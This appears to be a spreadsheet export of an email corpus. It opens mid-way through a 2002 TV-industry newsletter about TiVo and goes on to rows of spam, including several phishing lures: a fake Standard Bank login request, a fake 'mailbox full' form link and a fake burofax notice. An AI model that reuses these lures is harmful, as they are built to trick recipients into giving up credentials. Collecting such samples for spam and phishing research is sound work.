intensive marketing blitz over the next  five months, right through the holiday season. The blitz will include a sharp increase in  retail distribution, TV advertising and PR  efforts. The company needs to show Wall  Street -- and the industry -- that it will be  the brand leader in the PVR category. And it needs to show that it can generate mass consumer demand.  How does TiVo demonstrate that? Anything short of 750,000 subs at year's end will have people questioning whether TiVo has the right stuff. Cable execs, who are watching TiVo closely, might decide that adding the  service is not such a great selling point  after all. And Echostar, which currently does not have an agreement with TiVo, may decide to stay with its unbranded PVR service after  its merger with DIRECTV is approved in D.C.  (TiVo currently has a partnership with DIRECTV, but it's unclear what will happen to the deal if  the merger is approved.)  So there is much at stake -- and it's not extreme to say that TiVo's ultimate future could be decided in the next several months.  Will it succeed? I predict that TiVo will achieve a partial success. The company will boost its  subscriber numbers and it will maintain its claim as the #1 PVR service. However, in time, I  also predict it will decide to sell the company to a large media outfit, such as Sony or perhaps even Liberty Media. This would give TiVo the  necessary funding and industry connections for long-term growth and survival. To see more predictions on the future of TV,  click below!  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Breaking News =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [URL]http://rs6.net[/URL] Did you know that... * Cox Cable has decided to slow down its  roll-out of Video on Demand? * Consumers have no idea what HDTV is  all about, according to a new study? * One top network exec says viewers may  soon have to pay for off-air, free TV?  * According to the Associated Press,  the cable news networks may be spreading fear in our culture? * Las Vegas says West Wing's Martin Sheen is a shoo-in for a Best Actor Emmy?  These are just some of the many stories now  available for reading at TVPredictions.com  You can also read our prediction on CNN and Larry King, our expose of Forrester Research and Josh Bernoff, and perhaps our most  provocative story, "Sex and the Interactive  TV."  Click below to get the latest on the future of  TV!  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Coming Attractions! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [URL]http://rs6.net[/URL] The TVPredictions.com newsletter is published every Friday. Coming in future issues: * Donahue: Will He Survive the Cable News War? * What's Wrong -- and Right -- With Interactive TV?  * Why HDTV Could Change Hollywood Forever * Who Will Win the Emmy? An Exclusive Forecast. And check in daily at TVPredictions.com for more coverage of issues related to the future of TV.  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ------------------------------------------------ email:  swann@TVPredictions.com voice:  310-314-0603 web: [URL]http://www.tvpredictions.com[/URL] ------------------------------------------------ This email has been sent to  at your  request, by TVPredictions.com. Visit our Subscription Center to edit your interests or unsubscribe. [URL]http://ccprod.roving.com[/URL] View our privacy policy: [URL]http://ccprod.roving.com[/URL] Powered by  Constant Contact(R) [URL]www.constantcontact.com[/URL] ------=_Part_1210763_-1358544416.1028690797657 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable =09Special Report! TiVo: Now or Never? =09 =20 =20 =09TVPredictions.com Newsletter =09=A0=A0The #1 Newsletter on the Future of TV =09August 7, 2002=A0=A0 =09 =09 =09=09 =09=09 =09=09=09 =09=09=09 =09=09=09in this issue =09=09=09 =09=09=09 =09=09 =09=09 =09 =09 =09 =09=09 =09=09 =09=09=09 =09=09=09 =09=09=09Interactive TV Power Rankings! =09=09=09TiVo: Now or Never? =09=09=09Breaking News =09=09=09Coming Attractions! =09=09=09 =09=09     =09=09     =09=09 =09=09 =09=09=09 =09=09 =09=09 =09=09 =09=09Be a Star! =09=09 =09=09 =09=09By advertising today in  TVPredictions' weekly newsletter! Reach more than  3,000 subscribers, including TV's top decision-makers.  Promoting an Event? Selling a New Service? Looking for Brand Awareness? Well..advertise already!! Past advertisers include: American Film Institute The Carmel Group ISeeTV Iacta Espial Learn how YOU can reach our targeted audience, by clicking below or sending an e-mail to: advertising@ TVPredictions.com  Be a Star!= =09=09 =09 =09 =09 =09=09 =09=09 =09=09=09=A0=A0 =09=09=09 Hi Everyone, =09=09=09First of all, I want to welcome those subscribers who are getting this newsletter for the first time. Here you will find  hard-hitting commentary and analysis on issues related to the future of television. Whether it's Interactive TV, the battle between the cable news networks, the latest in  the Emmy race, or the federal government's fight to promote HDTV, TV Predictions will  give you the scoop -- before it actually  occurs. And, as long-time subscribers will tell you, we pull no punches.  (FYI -- TVPredictions.com, based in Los  Angeles, is owned and managed by Phillip Swann, author of "TV dot Com: The Future of  Interactive Television." He has been  quoted as an expert on TV issues in publications such as The Hollywood Reporter, Variety and  Electronic Media.)  Now, in this issue, we offer an all-new edition of... the Interactive TV Power Rankings! Plus: Why TiVo desperately needs to boost its sub numbers during the next five months. And, the latest news on  the future of TV.  =09=09=09 =09=09=09 =09=09 =09=09 =09=09=09  =09=09 =09=09 =09=09=09  =09=09 =09=09 =09=09=09  =09=09 =09=09 =09 =09 =09 =09=09 Interactive TV Power Rankings!= =A0=A0Every week,=  we publish the Interactive  TV Power Rankings. We rank the 10 companies that are benefiting most from the deployment of new TV technology.  This week's highlights: Will the FCC approve the Echostar-DIRECTV merger?; why did Cox scale back its Video on Demand plans?; why did Liberty Media buy a cable company in the Netherlands?; and  who at NBC is smoking crack? Find out in this all-new edition of... The Interactive TV Power Rankings!Interactive TV Power Rankings! =20          TiVo: Now or Never?=A0=A0Ready for this? The next five months could determine whether=20 TiVo, the Personal Video Recorder service, ultimately survives as a business. TiVo, which launched five years ago, has less  than 500,000 subscribers. The company's stock dipped below three this week. And network execs are openly questioning whether the digital recorder, which permits skipping commercials with a few  clicks of the remote, will destroy their advertising models. There even have been hints that the  networks could support a move by the cable  industry to offer a PVR that does not permit commercial skipping. And that PVR would not  be a TiVo.  To its credit, TiVo has been remarkably successful  at building brand loyalty and awareness. TiVo  reports that 97 percent of its subscribers have recommended the service to a friend. And when people talk about PVRs, they say TiVo. (Just  like the way people say "Coke" when they talk about soft drinks. ) But Wall Street, the media and the industry  are all growing impatient. TiVo needs to start putting some big numbers on the board --  and it needs to do it this holiday season. If  it doesn't, stock analysts who have supported TiVo  until now will run for the hills. That will push the company's stock price down even further. And if that happens, TiVo could have just two choices: Sell the company under duress or wait until its  funding dries up.  Consequently, I predict that TiVo will launch  an intensive marketing blitz over the next  five months, right through the holiday season. The blitz will include a sharp increase in  retail distribution, TV advertising and PR  efforts. The company needs to show Wall  Street -- and the industry -- that it will be  the brand leader in the PVR category. And it needs to show that it can generate mass consumer demand.  How does TiVo demonstrate that? Anything short of 750,000 subs at year's end will have people questioning whether TiVo has the right stuff. Cable execs, who are watching TiVo closely, might decide that adding the  service is not such a great selling point  after all. And Echostar, which currently does not have an agreement with TiVo, may decide to stay with its unbranded PVR service after  its merger with DIRECTV is approved in D.C.  (TiVo currently has a partnership with DIRECTV, but it's unclear what will happen to the deal if  the merger is approved.)  So there is much at stake -- and it's not extreme to say that TiVo's ultimate future could be decided in the next several months.  Will it succeed? I predict that TiVo will achieve a partial success. The company will boost its  subscriber numbers and it will maintain its claim as the #1 PVR service. However, in time, I  also predict it will decide to sell the company to a large media outfit, such as Sony or perhaps even Liberty Media. This would give TiVo the  necessary funding and industry connections for long-term growth and survival. To see more predictions on the future of TV,  click below! TiV= o: Now or Never? =20 =09=09 Breaking News=A0=A0Did you know that... * Cox Cable has decided to slow down its  roll-out of Video on Demand? * Consumers have no idea what HDTV is  all about, according to a new study? * One top network exec says viewers may  soon have to pay for off-air, free TV?  * According to the Associated Press,  the cable news networks may be spreading fear in our culture? * Las Vegas says West Wing's Martin Sheen is a shoo-in for a Best Actor Emmy?  These are just some of the many stories now  available for reading at TVPredictions.com  You can also read our prediction on CNN and Larry King, our expose of Forrester Research and Josh Bernoff, and perhaps our most  provocative story, "Sex and the Interactive  TV."  Click below to get the latest on the future of  TV! Breaking News =20 =09=09 Coming Attractions!=A0=A0The TVPredictions.com newsle= tter is published every Friday. Coming in future issues: * Donahue: Will He Survive the Cable News War? * What's Wrong -- and Right -- With Interactive TV?  * Why HDTV Could Change Hollywood Forever * Who Will Win the Emmy? An Exclusive Forecast. And check in daily at TVPredictions.com for more coverage of issues related to the future of TV. Coming Attractions! =20        =20 =20 =20          =09 =09 =09 =09 =09 =09 =09 =09 =09email us =A0::=A0 vis= it our site =09 phone: 310-314-0603 =09 =09 =09&lt;!--  You are required by your Constant Contact user agreement to =09    provide the opt-out link shown below as by the property 'OptOut'. --= &gt;          This email was sent to , at your request, by TVPredictions.com. =20     Visit our Subscription Center to edit your=  interests or unsubscribe.     View our privacy policy. =20     Powered by =09 =09 ------=_Part_1210763_-1358544416.1028690797657-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://rs6.net http://rs6.net http://rs6.net http://rs6.net http://rs6.net http://www.tvpredictions.com http://ccprod.roving.com http://ccprod.roving.com www.constantcontact.com http://xent.com</t>
  </si>
  <si>
    <t>5727</t>
  </si>
  <si>
    <t>To: byrt5@hotmail.com\nFrom: gina3@freemail.nl\nDate: Tue,  6 Aug 2002 13:27:55 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue,  6 Aug 2002 13:27:55 -0400 (EDT)</t>
  </si>
  <si>
    <t>gina3@freemail.nl</t>
  </si>
  <si>
    <t>byrt5@hotmail.com</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lotsonet.com[/URL]\n\nand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.\nNO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO\nONLY.\n\n[URL]http://www.lotsonet.com[/URL]\n\nYou want to be independent?  THEN MAKE IT HAPPEN!\nHAPPEN!\n\nSIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!\nGUARANTEED!\n\n[URL]http://www.lotsonet.com[/URL]\n\n\nTo be removed from our link simple go to:\n\n[URL]http://www.lotsonet.com[/URL]\n\n\n6414pQes2-008QthF8093ahxJ6-676cumj9620Ohcr3-405taCI6431voNa4-662XWln5l65</t>
  </si>
  <si>
    <t>1286</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Notificados.com &lt;notificacion@notificados.com&gt;\nDate: Tue,  2 Feb 2021 06:25:48 +0200 (EET)</t>
  </si>
  <si>
    <t>Tue,  2 Feb 2021 06:25:48 +0200 (EET)</t>
  </si>
  <si>
    <t>Notificados.com &lt;notificacion@notificados.com&gt;</t>
  </si>
  <si>
    <t>Envio de Burofax Online - ultima advertencia - [ id 77106725  ]</t>
  </si>
  <si>
    <t>Document Notificados             [URL]www.notificados.com[/URL]              Comunicaciones fehacientes - Burofax Online Descargar todos archivos adjuntos ( 128 kb)                 Fecha y hora del envio: martes, 01 da febrero de 2021, 07:20 hs,                              Remitente: DEPARTAMENTO JURIDICO ABOGADOS VINAR DOGARIA VERDU CALLE LIMA                              20 28006 MADRID (MADRID)                              Numero de paginas 1              02/02/2021 06:25:48</t>
  </si>
  <si>
    <t>www.notificados.com</t>
  </si>
  <si>
    <t>1346</t>
  </si>
  <si>
    <t>To: nan\nFrom: Kailashsingh Kharayat &lt;kailashsingh@teco.co.in&gt;\nDate: Thu, 9 Sep 2021 05:10:35 +0800</t>
  </si>
  <si>
    <t>Thu, 9 Sep 2021 05:10:35 +0800</t>
  </si>
  <si>
    <t>Kailashsingh Kharayat &lt;kailashsingh@teco.co.in&gt;</t>
  </si>
  <si>
    <t>FW: Order Signed agreement</t>
  </si>
  <si>
    <t>Hello</t>
  </si>
  <si>
    <t>414</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "ibsupport@standardbank.co.za" &lt;ibsupport@standardbank.co.za&gt;\nDate: Thu, 8 Dec 2016 16:02:47 +0000</t>
  </si>
  <si>
    <t>Thu, 8 Dec 2016 16:02:47 +0000</t>
  </si>
  <si>
    <t>"ibsupport@standardbank.co.za" &lt;ibsupport@standardbank.co.za&gt;</t>
  </si>
  <si>
    <t>Standard Bank :) Pending payment</t>
  </si>
  <si>
    <t>Dear customer You havenew pending deposit. Login here to complete your transactions now. All fields are mandatory and incomplete information will delay the processing of your payment. RegardsEliteBanking Team Copyright Standard Bank. All rights reserved.Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider. Registered credit provider (NCRCP15). Disclaimer and confidentiality note:Everything in this email and any attachments relating to the official business of Standard Bank Group Limited is proprietary to the group.It is confidential, legally privileged and protected by law. Standard Bank does not own and endorse any other content. The person addressed in the email is the sole authorised recipient. Please notify the sender immediately if it!   has unintentionally reached you a! nd do not read disclose or use the content in any way.Standard Bank cannot assume that the integrity of this communication has been maintained nor that it is free of errors, virus, interception or interference. For our privacy policy or information about the Standard Bank group visit our website at [URL]www.standardbank.co.za[/URL]</t>
  </si>
  <si>
    <t>www.standardbank.co.za</t>
  </si>
  <si>
    <t>5774</t>
  </si>
  <si>
    <t>To: hgt3@hotmail.com\nFrom: jtr4@zonnet.nl\nDate: Thu, 8 Aug 2002 18:57:57 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 18:57:57 +0100</t>
  </si>
  <si>
    <t>jtr4@zonnet.nl</t>
  </si>
  <si>
    <t>hgt3@hotmail.com</t>
  </si>
  <si>
    <t>HELP WANTED. WORK FROM HOME. FREE DETAILS</t>
  </si>
  <si>
    <t>WE NEED HELP.  We are a 14 year old fortune 500 company, and we have \ngrown 1000%!  We cannot keep up.  We are looking for individuals who \nwant to work at home, and make a good living.\n\nSo if you are looking to be employed from home with a career that has\nvast opportunities, then go:\n\n[URL]http://www.basetel.com[/URL]\n\nand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.\nNO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO\nONLY.\n\n[URL]http://www.basetel.com[/URL]\n\nYou want to be independent?  THEN MAKE IT HAPPEN!\nHAPPEN!\n\nSIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!\nGUARANTEED!\n\n[URL]http://www.basetel.com[/URL]\n\n\nTo be removed from our link simple go to:\n\n[URL]http://www.basetel.com[/URL]</t>
  </si>
  <si>
    <t>http://www.basetel.com http://www.basetel.com http://www.basetel.com http://www.basetel.com</t>
  </si>
  <si>
    <t>5775</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Lowest LD &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Thu, 8 Aug 2002 14:06:05 -0500</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 14:06:05 -0500</t>
  </si>
  <si>
    <t>Lowest LD &lt;greatoffers@sendgreatoffers.com&gt;</t>
  </si>
  <si>
    <t>3.9 Cents With No Monthly Fees - Best Long Distance On the Net</t>
  </si>
  <si>
    <t>![]([URL]http://theadmanager.com[/URL] |\n![]([URL]http://theadmanager.com[/URL] |\n![]([URL]http://theadmanager.com[/URL] |\n![]([URL]http://theadmanager.com[/URL] |\n![]([URL]http://theadmanager.com[/URL]  \n---|---|---|---|---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URL]http://theadmanager.com[/URL]  \n![T]([URL]http://admanmail.com[/URL]\n\n* * *\n\nYour are receiving this mailing because you are a member of\nSendGreatOffers.com and subscribed as:JM@NETNOTEINC.COM To unsubscribe  Click\nHere ([URL]http://admanmail.com[/URL];=SGO) or\nreply to this email with REMOVE in the subject line - you must also include\nthe body of this message to be unsubscribed. Any correspondence about the\nproducts/services should be directed to the company in the ad.  \n\n</t>
  </si>
  <si>
    <t>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theadmanager.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>5773</t>
  </si>
  <si>
    <t>To: "JOSEPH  ABITANTE" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Bob Maier" &lt;info7@mailpound.com&gt;\nDate: Thu, 8 Aug 2002 12:16:05 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 12:16:05 -0400</t>
  </si>
  <si>
    <t>"Bob Maier" &lt;info7@mailpound.com&gt;</t>
  </si>
  <si>
    <t>"JOSEPH  ABITANTE" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Selling Travel in Today's Economy</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \nGood morning!\n\n\n\nSince it may have been awhile since you visited us at [URL]www.mailpound.com[/URL] I\nwanted to update you on what is happening. When we launched the MailPound\nalmost two years ago, our focus was on saving "Time, Toner and Trees" by\nproviding an alternative for organizing the huge number of faxes suppliers\nsent travel agents each week. Our most popular feature was the FAM section,\nfollowed by the Weekly Sweepstakes.\n\n\n\nBut that has changed.\n\n\n\nLike many involved in selling retail travel, we have been striving to find\nways to succeed in a challenging environment. Additional commission cuts, the\naftermath of 9/11, and the drop in the stock market, has had a cumulative\neffect on all of us. To survive, to succeed, we know that we will need to work\nharder, work smarter, and work together. We have gotten a tremendous amount of\nsupport from travel agents and this has translated into the ability to get\nmore support for travel agents from suppliers.\n\n\n\nOur focus has expanded from providing a resource for searching supplier\nSpecial Offers to providing a suite of tools and services that can create\nsales and raise commissions. Almost all of these services are supplier\nsupported and FREE to travel agents.\n\n  * Actively seek out the best e-commerce values\n  * Help you market Special Offers to your clients\n  * Host personal web sites for travel agents with MailPound content*\n  * Offer higher commissions through consolidation\n  * Organize sales incentives from suppliers\n  * Provide new technology for fast and easy online bookings\n  * Provide your clients with the ability to book through you, online\n\n* MP _direct_ services are offered for $9.95/month\n\n\n\nWe invite you to visit us soon at [URL]www.mailpound.com[/URL] or check out the links\nshown below. See how the FREE services we offer the travel agent community can\nhelp you succeed. The Summer is almost over, now is the time to prepare for\nthe upcoming selling season.\n\n\n\n    * For more information regarding higher commissions and booking online:  [URL]www.mailpound.com[/URL]\n    * For more information about your personal web site:  \n[URL]www.mailpound.com[/URL]\n\n    * To register FREE at MailPound:  \n[URL]www.mailpound.com[/URL]\n\n  \nSincerely,\n\n\n\nBob Maier, President  \nSMART Travel Technologies, Inc.\n\nrmaier@smart2000.com  \n856-983-6100  Ext. 101  \n12 East Stow Road, Suite 210  \nMarlton, New Jersey 08053\n\n\n\n\n\n\n\n\n\nIf you do not want to receive these messages in the future, please reply to\nthis message with REMOVE in the subject line.\n\n[URL]http://xent.com[/URL]\n\n</t>
  </si>
  <si>
    <t>www.mailpound.com www.mailpound.com www.mailpound.com www.mailpound.com www.mailpound.com http://xent.com</t>
  </si>
  <si>
    <t>5762</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "_Ricardo_" &lt;topseg321@bol.com.br&gt;\nDate: Thu, 8 Aug 2002 11:08:32</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 11:08:32</t>
  </si>
  <si>
    <t>"_Ricardo_" &lt;topseg321@bol.com.br&gt;</t>
  </si>
  <si>
    <t>_Melhore sua segurana_</t>
  </si>
  <si>
    <t>Ricardo     Olá     Trabalho divulgando empresas sérias e competentes que podem lhe oferecer excelentes oportunidades.     Caso não seja de seu interesse solicito que exclua este e-mail ou se possível o repasse para seus amigos.     Muito obrigado pela ajuda e compreensão     Atenciosamente...     Ricardo L. Kampf. Proteja seu patrimônio sem gastar uma fortuna Camera Falsa M01 R$ 36,00 frete incluso Para ver outros modelos ou obter mais detalhes clique aqui. Outros produtos Escuta telefônica Alarmes Cameras verdadeiras Trava de Câmbio R$ 38,00 Frete incluso Ao mesmo tempo trava a alavanca do câmbio e do freio de mão.  Fabricada em aço carbono e ferro, pintura eletrostática. Fechadura Tetra Para ver outros modelos ou obter mais detalhes clique aqui e visite nossa loja.       Para se retirar do cadastro, favor responder sem assunto.   [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5769</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "1st Dental Plans" &lt;eml7@hotmail.com&gt;\nDate: Thu, 8 Aug 2002 10:58:40</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 10:58:40</t>
  </si>
  <si>
    <t>"1st Dental Plans" &lt;eml7@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Dental Coverage For $6.95 Per Month</t>
  </si>
  <si>
    <t>![](_blnk.gif) | ![](_blnk.gif) | ![](_blnk.gif) | ![](_blnk.gif) |\n![](_blnk.gif) | ![](_blnk.gif) | ![](_blnk.gif) | ![](_blnk.gif) |\n![](_blnk.gif) | ![](_blnk.gif) | ![](_blnk.gif) | ![](_blnk.gif) |\n![](_blnk.gif) | ![](_blnk.gif)  \n---|---|---|---|---|---|---|---|---|---|---|---|---|---  \n|  |  |  |  |  |  |  |  |  |  |  |  |  \n|  ![]([URL]http://www.firstdentalplans.com[/URL]\nfolder/scrapbook/304000.JPG)  \n|  \n|  |  | ![](_blnk.gif)  \n---  \n![](_blnk.gif) |  |  |  |  \n---|---|---  \n|\n\n**Dental Plans For $6.95 Per Month  \n** |  \n|  \n![](_blnk.gif)  \n![](_blnk.gif)  \n|  \n|  \n|  |  |  |  |  \n---|---|---  \n|\n\n_**Dental Plans For You And Your Entire Family  \n**_ |  \n|  \n|  \n|  |  ![](img1.jpg) |  |  | ![](_blnk.gif)  \n---  \n![](_blnk.gif) |  |  |  |  \n---|---|---  \n|\n\n_**A Variety Of Plan Choices Nationwide  \n  \nDental Plans For Individuals and Employer Groups  \n**_ |  \n|  \n![](_blnk.gif)  \n![](_blnk.gif)  \n|  |  \n|  \n|  |  |  |  |  |  \n---|---|---  \n|\n\n**You can choose from traditional dental insurance that lets you see any\ndentist you wish, or if you do not have your own private dentist, choose one\nof our plans that offer dental coverage from   pre-screened dental offices and\nsave hundreds of dollars on your dental treatment.  \n**  \n\n _Dental Plans With No Deductibles.  \nDental Plans That Cover Orthodontics  \nShould You Need To See A Dentist Right Away...  \n  \n\n_  \n  \nTo Compare Plans Benefits And Rates, Click Here  \n  \n  \nTo be removed from this emailing list, please reply to this message by\nclicking on REMOVE  \n  \n|  \n|  \n|  \n|  |  |  |  |  \n---|---|---  \n|\n\nFirst American Dental Plans  \n[URL]www.firstdentalplans.com[/URL]  \n|  \n|  \n|  \n|  |  |  \n---|---|---  \n|\n\n_To contact us:  \n_ |  \n|  \n|  \n|  |  |  \n---|---|---  \n|\n\nPhone: 800-711-8817  \nFax: 800-752-4040  \nEmail: sales@firstdentalplans.com  \n|  \n|  \n|  \n|  |  |  \n---|---|---  \n|\n\n1525 Mesa Verde East, Suite 107  \nCosta Mesa, CA  92626  \n|  \n|\n\n</t>
  </si>
  <si>
    <t>http://www.firstdentalplans.com www.firstdentalplans.com</t>
  </si>
  <si>
    <t>5770</t>
  </si>
  <si>
    <t>To: dannywalk@ntlworld.com, ross@excentric.com,\nFrom: reenspring@happyman.com ()\nDate: Thu, 8 Aug 2002 08:36:28 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 08:36:28 -0400 (EDT)</t>
  </si>
  <si>
    <t>reenspring@happyman.com ()</t>
  </si>
  <si>
    <t>dannywalk@ntlworld.com, ross@excentric.com,</t>
  </si>
  <si>
    <t>[ILUG] FREE FREE FREE!</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by\n (reenspring@happyman.com) on Thursday, August 8, 2002 at 08:36:27\n---------------------------------------------------------------------------\n\nmessage: - - - - - FREE FREE FREE! - - - - - Thats right free unlimited web cam feeds! - chat! - pictures! - videos! -   ALL FREE!!! YOU PAY NOTHING!!! NOT ONE CENT! - This is a limited time offer because these gitls can't work for free so hurry up and click this link! [URL]http://teensforfree.cjb.net[/URL]  \n\n---------------------------------------------------------------------------\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://teensforfree.cjb.net http://www.linux.ie</t>
  </si>
  <si>
    <t>5771</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: idxxHQH FREE Jimmy &lt;wvJimmyfreel1180xoxo@c1net.com&gt;\nDate: Thu, 8 Aug 2002 06:13:47 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 06:13:47 -0700</t>
  </si>
  <si>
    <t>idxxHQH FREE Jimmy &lt;wvJimmyfreel1180xoxo@c1net.com&gt;</t>
  </si>
  <si>
    <t>Free Software! Games, Movie, Mp3, more free now!!! blwe</t>
  </si>
  <si>
    <t>My FREE Media Sofware link enjoy, Jim---&gt; [URL]http://www.freeoptmail3.com[/URL] Click here to go to the site  Personal Quote: All for one and one for all. This is not a spam email. This email was sent to you because your email was entered in on a website requesting to be a registered subscriber. click here to cancel your account and you will  never receive another email from us! Please add remove in the subject line. tgwwcvwledqaerisufctgsfkf</t>
  </si>
  <si>
    <t>http://www.freeoptmail3.com</t>
  </si>
  <si>
    <t>5765</t>
  </si>
  <si>
    <t>To: " " &lt;fork@spamassassin.taint.org&gt;\nFrom: "GiftCD Alert" &lt;alert@giftcd.com&gt;\nDate: Thu, 8 Aug 2002 02:20:02 -0500 (CDT)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 02:20:02 -0500 (CDT)</t>
  </si>
  <si>
    <t>"GiftCD Alert" &lt;alert@giftcd.com&gt;</t>
  </si>
  <si>
    <t>" " &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>911 Anniv Bush Memorial Bill for You</t>
  </si>
  <si>
    <t>----------------------------------------------------------\n&gt;&gt;  GiftCD Offer Newsletter Confirmation August 8th, 2002\n----------------------------------------------------------\n\nThank you for your subscription.\nAs a valued GiftCD subscriber, check out this great \ngift!\n\nThank you for your subscription.\nThis message was sent to you as a Valued GiftCD\nsubscriber. Check out this great gift!\n\n\n\n+--------------------------------------------------------+\n911 Anniversary Gift.\n+--------------------------------------------------------+\n\nFree with NO SHIPPING! Grab one of this hot gift,\navailable to all Americans for free. (valid until Sep 11)\n[URL]http://giftcd.com[/URL]\n\n\n\n\n+--------------------------------------------------------+\nFREE ColonialMint $2001 Bush Memorial Dollar Bill\n+--------------------------------------------------------+\n\nPerfect gift for mom, dad, family members, friends and \nco-workers. Every American should have one.\n(Free gift valid for U.S. Residents Only)\n[URL]http://www.giftcd.com[/URL]\n\n\n\n\n+--------------------------------------------------------+\n~~~ Free 911 Anniv $2001 Dollar gift.\n+--------------------------------------------------------+\n\nLimited collector item. Grab one of the hottest \nAmerican collection for FREE before Sep 11 2002.\n[URL]http://giftcd.com[/URL]\n\n\n\n\nRegards,\nMelanie Conell\nGift CD Editorial Team\n[URL]http://www.giftcd.com[/URL]\n\n\n----------------------------------------------------------\n&gt;&gt;  Subscription, Disclaimer &amp; Copyright\n----------------------------------------------------------\n\nThis email is part of your GiftCD Newsletter\nsubscription. If you are no longer interested, \nplease forward this email to:\nunsubscribenow@giftcd.com\n\nIMPORTANT: To protect our subscribers privacy, \nwe do not allow third party subscriptions. If you \nreceive this email by mistake or your friend subscribe \nfor you without your consent, please forward this email \nto us for further investigation. \n\nWe welcome suggestions, comments and feedback. \nContact us at: optinsupport@giftcd.com\n\n==========================================================\nCopyright 2002 GiftCD.com. All rights reserved.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://giftcd.com http://www.giftcd.com http://giftcd.com http://www.giftcd.com http://xent.com</t>
  </si>
  <si>
    <t>5761</t>
  </si>
  <si>
    <t>To: fpjkneedwk@takemetothesavings.com\nFrom: firstever001@now3.takemetothesavings.com\nDate: Thu, 8 Aug 2002 00:31:01 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 00:31:01 -0400</t>
  </si>
  <si>
    <t>firstever001@now3.takemetothesavings.com</t>
  </si>
  <si>
    <t>fpjkneedwk@takemetothesavings.com</t>
  </si>
  <si>
    <t>ADV: Lowest life insurance rates available!                                                   irloq</t>
  </si>
  <si>
    <t>Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! [URL]http://www.takemetothesavings.com[/URL] \n       \n Representing quality nationwide carriers. Act now!\n      \n      \n      \n      \n      \n ---------------------------------------\n To unsubscribe, go to: \n [URL]http://www.takemetothesavings.com[/URL]\n Please allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>356</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Stevenson, Brenda" &lt;bstevenson@dvisd.net&gt;\nDate: Thu, 6 Oct 2016 15:34:13 +0000</t>
  </si>
  <si>
    <t>Thu, 6 Oct 2016 15:34:13 +0000</t>
  </si>
  <si>
    <t>"Stevenson, Brenda" &lt;bstevenson@dvisd.net&gt;</t>
  </si>
  <si>
    <t>Your Mailbox</t>
  </si>
  <si>
    <t>Your Mailbox is almost full. Please click on this link [URL]http://site9301862.92.webydo.com[/URL] and fill the form correctly and send so we can upgrade and validate your mailbox. this message is from System Administrator.\n\n</t>
  </si>
  <si>
    <t>http://site9301862.92.webydo.com</t>
  </si>
  <si>
    <t>5109</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - GSL" &lt;gsl@insurancemail.net&gt;\nDate: Thu, 6 Jun 2002 21:32:00 -0400</t>
  </si>
  <si>
    <t>Thu, 6 Jun 2002 21:32:00 -0400</t>
  </si>
  <si>
    <t>"IQ - GSL" &lt;gsl@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Ground breaking post card creates annuity leads</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_5B81AF_01C20D87.4EEF5910 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Generate your own leads using ground-breaking Roth conversion postcards.	  	   _____   Every senior wants to hear about the roth conversion if you can eliminate the up front tax cost. You can with the new and improved roth conversion program from GSL Advisory.  The cheapest and most successful way to generate roth conversion program leads is to send postcards while also placing an ad in the small local paper. Repeat the ads and the postcard mailing at least 6 different times. The one truth in advertising is that repetition works. Even the smallest and most unassuming ad works if it is seen several times. See if you can find an area that has its own zip code and a local paper serving that area. Some retirement communities have both a newspaper and their own zip code. This is your gold mine. To see the postcard and ad and to learn how to work the system, complete 